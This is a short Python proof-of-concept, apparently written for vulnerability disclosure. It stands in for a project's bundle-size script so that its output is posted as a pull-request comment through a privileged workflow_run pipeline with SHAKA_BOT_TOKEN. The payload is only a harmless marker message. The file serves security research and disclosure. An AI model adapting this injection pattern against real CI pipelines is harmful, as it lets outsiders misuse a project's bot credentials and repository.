#!/usr/bin/env python3
"""
SECURITY RESEARCH PoC - Artifact Injection Demonstration
This script demonstrates that an attacker can control report.md content
which is then used by the privileged comment-bundle-size.yaml workflow.
"""
import argparse, sys

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("command")
    parser.add_argument("--pr-number", default="0")
    parser.add_argument("--head", default="head.json")
    parser.add_argument("--base", default="base.json")
    args = parser.parse_args()

    if args.command == "measure":
        # Normal operation: output empty JSON
        import json
        print(json.dumps({}))
        return 0

    if args.command == "compare":
        # ATTACKER CONTROLLED OUTPUT - posted as comment via SHAKA_BOT_TOKEN
        print(f"<!-- PR #{args.pr_number} -->")
        print("## Bundle Size Report")
        print("**[SECURITY RESEARCH PoC]** This content was generated by attacker-controlled")
        print("code in compute-bundle-size.py and will be posted via SHAKA_BOT_TOKEN.")
        print("This demonstrates workflow_run artifact injection (CVE candidate).")
        return 0

    return 0

if __name__ == "__main__":
    sys.exit(main())

